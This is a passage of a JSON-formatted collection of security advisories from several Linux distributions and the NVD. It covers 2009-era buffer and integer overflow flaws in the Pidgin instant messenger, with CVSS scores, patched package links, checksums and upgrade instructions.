http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 753872 81133dbb351067d2d3ef6bbc136c106f\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 1760422 379017e7d47927678f6b404aa4d12936\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 362944 f0cc1dea3b629fb34549d228599bd567\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 3, "modified": "2009-08-19T22:33:52", "published": "2009-08-19T22:33:52", "id": "DEBIAN:DSA-1870-1:14B64", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00187.html", "title": "[SECURITY] [DSA 1870-1] New pidgin packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:13", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "\nSecunia reports:\n\nSome vulnerabilities and weaknesses have been reported in Pidgin,\n\t which can be exploited by malicious people to cause a DoS or to\n\t potentially compromise a user's system.\nA truncation error in the processing of MSN SLP messages can be\n\t exploited to cause a buffer overflow.\nA boundary error in the XMPP SOCKS5 \"bytestream\" server when\n\t initiating an outgoing file transfer can be exploited to cause a\n\t buffer overflow.\nA boundary error exists in the implementation of the\n\t \"PurpleCircBuffer\" structure. This can be exploited to corrupt memory\n\t and cause a crash via specially crafted XMPP or Sametime\n\t packets.\nA boundary error in the \"decrypt_out()\" function can be exploited\n\t to cause a stack-based buffer overflow with 8 bytes and crash the\n\t application via a specially crafted QQ packet.\n\n", "edition": 4, "modified": "2009-06-03T00:00:00", "published": "2009-06-03T00:00:00", "id": "B1CA65E6-5AAF-11DE-BC9B-0030843D3802", "href": "https://vuxml.freebsd.org/freebsd/b1ca65e6-5aaf-11de-bc9b-0030843d3802.html", "title": "pidgin -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "New pidgin packages are available for Slackware 12.0, 12.1, 12.2, and -current\nto fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/pidgin-2.5.6-i486-1_slack12.2.txz: Upgraded to pidgin-2.5.6.\n This version fixes security issues that could lead to a denial of service or\n the execution of arbitrary code as the user running Pidgin.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1373\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1374\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1375\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1376\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/pidgin-2.5.6-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/pidgin-2.5.6-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/pidgin-2.5.6-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/pidgin-2.5.6-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/pidgin-2.5.6-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 12.0 package:\n8890772717a70b042f5c76ae4e4ab6b0 pidgin-2.5.6-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n3d7e918ff1d3eef13107472f313978a4 pidgin-2.5.6-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n144a78d203391bd7af7aac36d53061f3 pidgin-2.5.6-i486-1_slack12.2.tgz\n\nSlackware -current package:\n0b2aa951d3f6b9f8d5a9ac7e8d28c7a6 pidgin-2.5.6-i486-1.txz\n\nSlackware64 -current package:\ne79c2f0466d4714951a7f53f04740695 pidgin-2.5.6-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg pidgin-2.5.6-i486-1_slack12.2.tgz", "modified": "2009-05-26T19:19:48", "published": "2009-05-26T19:19:48", "id": "SSA-2009-146-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.435503", "type": "slackware", "title": "pidgin", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:05", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "modified": "2017-09-08T11:57:15", "published": "2009-05-22T04:00:00", "id": "RHSA-2009:1060", "href": "https://access.redhat.com/errata/RHSA-2009:1060", "type": "redhat", "title": "(RHSA-2009:1060) Important: pidgin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:35:42", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1373", "CVE-2009-1376"], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "modified": "2018-05-26T04:26:17", "published": "2009-05-22T04:00:00", "id": "RHSA-2009:1059", "href": "https://access.redhat.com/errata/RHSA-2009:1059", "type": "redhat", "title": "(RHSA-2009:1059) Important: pidgin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-07-17T03:32:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1060\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027929.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027930.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027975.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1060.html", "edition": 5, "modified": "2009-05-25T16:36:05", "published": "2009-05-22T21:24:35", "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/027929.html", "id": "CESA-2009:1060", "title": "finch, libpurple, pidgin security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:25:56", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1059\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027927.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027928.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027971.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/027973.html\n\n**Affected packages:**\npidgin\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1059.html", "edition": 3, "modified": "2009-05-25T15:35:42", "published": "2009-05-22T14:04:17", "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/027927.html", "id": "CESA-2009:1059", "title": "pidgin security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "[2.5.5-2]\n- Security/DoS fixes from 2.5.6\n CVE-2009-1373-8331e31a\n CVE-2009-1374-ad057b75\n 2c9a1153\n CVE-2009-1375-7829ec76\n CVE-2009-1376-9dd1c4c3 ", "edition": 4, "modified": "2009-05-26T00:00:00", "published": "2009-05-26T00:00:00", "id": "ELSA-2009-1060", "href": "http://linux.oracle.com/errata/ELSA-2009-1060.html", "title": "pidgin security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:36", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "description": "[1.5.1-3]\n- CVE-2009-1373\n- CVE-2009-1376 ", "edition": 4, "modified": "2009-05-22T00:00:00", "published": "2009-05-22T00:00:00", "id": "ELSA-2009-1059", "href": "http://linux.oracle.com/errata/ELSA-2009-1059.html", "title": "pidgin security update", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:23:45", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "description": "It was discovered that Pidgin did not properly handle certain malformed \nmessages when sending a file using the XMPP protocol handler. If a user \nwere tricked into sending a file, a remote attacker could send a specially \ncrafted response and cause Pidgin to crash, or possibly execute arbitrary \ncode with user privileges. (CVE-2009-1373)\n\nIt was discovered that Pidgin did not properly handle certain malformed \nmessages in the QQ protocol handler. A remote attacker could send a \nspecially crafted message and cause Pidgin to crash. This issue only \naffected Ubuntu 8.10 and 9.04. (CVE-2009-1374)\n\nIt was discovered that Pidgin did not properly handle certain malformed \nmessages in the XMPP and Sametime protocol handlers. A remote attacker \ncould send a specially crafted message and cause Pidgin to crash. \n(CVE-2009-1375)\n\nIt was discovered that Pidgin did not properly handle certain malformed \nmessages in the MSN protocol handler. A remote attacker could send a \nspecially crafted message and possibly execute arbitrary code with user \nprivileges. (CVE-2009-1376)", "edition": 5, "modified": "2009-06-03T00:00:00", "published": "2009-06-03T00:00:00", "id": "USN-781-1", "href": "https://ubuntu.com/security/notices/USN-781-1", "title": "Pidgin vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:22:48", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "description": "It was discovered that Gaim did not properly handle certain malformed \nmessages when sending a file using the XMPP protocol handler. If a user \nwere tricked into sending a file, a remote attacker could send a specially \ncrafted response and cause Gaim to crash, or possibly execute arbitrary \ncode with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed \nmessages in the MSN protocol handler. A remote attacker could send a \nspecially crafted message and possibly execute arbitrary code with user \nprivileges. (CVE-2009-1376)", "edition": 5, "modified": "2009-06-03T00:00:00", "published": "2009-06-03T00:00:00", "id": "USN-781-2", "href": "https://ubuntu.com/security/notices/USN-781-2", "title": "Gaim vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:49:52", "description": "BUGTRAQ ID: 35067\r\nCVE(CAN) ID: CVE-2009-1376,CVE-2009-1375,CVE-2009-1374,CVE-2009-1373\r\n\r\nPidgin\u662f\u652f\u6301\u591a\u79cd\u534f\u8bae\u7684\u5373\u65f6\u901a\u8baf\u5ba2\u6237\u7aef\u3002\r\n\r\nPidgin\u5728\u5904\u7406\u5404\u79cd\u5373\u65f6\u6d88\u606f\u65f6\u5b58\u5728\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u5b8c\u5168\u5165\u4fb5\u7528\u6237\u7684\u7cfb\u7edf\u3002\r\n\r\n1) \u5904\u7406MSN SLP\u6d88\u606f\u65f6\u7684\u622a\u5c3e\u9519\u8bef\u53ef\u80fd\u5bfc\u81f4\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n2) XMPP SOCKS5 bytestream\u670d\u52a1\u5668\u5728\u521d\u59cb\u5316\u51fa\u7ad9\u6587\u4ef6\u4f20\u8f93\u65f6\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u3002\r\n\r\n3) PurpleCircBuffer\u7ed3\u6784\u7684\u5b9e\u73b0\u4e2d\u5b58\u5728\u8fb9\u754c\u6761\u4ef6\u9519\u8bef\uff0c\u7279\u5236\u7684XMPP\u6216Sametime\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4\u5185\u5b58\u7834\u574f\u800c\u5d29\u6e83\u3002\r\n\r\n4) \u7279\u5236\u7684QQ\u62a5\u6587\u53ef\u80fd\u5bfc\u81f4decrypt_out()\u51fd\u6570\u51fa\u73b08\u4e2a\u5b57\u8282\u7684\u6808\u6ea2\u51fa\u3002\r\n\n\nPidgin &lt; 2.5.6\n \u5382\u5546\u8865\u4e01\uff1a\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1060-02\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1060-02\uff1aImportant: pidgin security update\r\n\u94fe\u63a5\uff1a<a href=\"https://www.redhat.com/support/errata/RHSA-2009-1060.html\" target=\"_blank\" rel=external nofollow>https://www.redhat.com/support/errata/RHSA-2009-1060.html</a>", "published": "2009-05-25T00:00:00", "type": "seebug", "title": "Pidgin\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "modified": "2009-05-25T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11415", "id": "SSV:11415", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T05:35:14", "description": "Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin before 2.4.3 and Adium before 1.3 allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, a different vulnerability than CVE-2008-2955.", "edition": 6, "cvss3": {}, "published": "2008-07-07T23:41:00", "title": "CVE-2008-2927", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2927"], "modified": "2018-10-11T20:44:00", "cpe": ["cpe:/a:adium:adium:1.0", "cpe:/a:adium:adium:1.1.2", "cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:adium:adium:1.0.4", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:adium:adium:1.1.1", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:adium:adium:1.0.5", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:adium:adium:1.1", "cpe:/a:adium:adium:1.0.1", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:adium:adium:1.2.7", "cpe:/a:adium:adium:1.0.3", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:adium:adium:1.0.2", "cpe:/a:adium:adium:1.1.3", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:adium:adium:1.1.4", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2008-2927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2927", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:adium:adium:1.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:01", "description": "Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.", "edition": 6, "cvss3": {}, "published": "2009-05-26T15:30:00", "title": "CVE-2009-1376", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1376"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.0"], "id": "CVE-2009-1376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1376", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.1:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.0:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.4:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.2:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.0:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.2:32_bit:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.4.3:32_bit:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:01", "description": "Buffer overflow in the decrypt_out function in Pidgin (formerly Gaim) before 2.5.6 allows remote attackers to cause a denial of service (application crash) via a QQ packet.", "edition": 6, "cvss3": {}, "published": "2009-05-26T15:30:00", "title": "CVE-2009-1374", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1374"], "modified": "2017-09-29T01:34:00", "cpe": ["cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2009-1374", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1374", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:pidgin:pidgin:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:pidgin:pidgin:2.5.3:*:*:*:*:*:*:*", 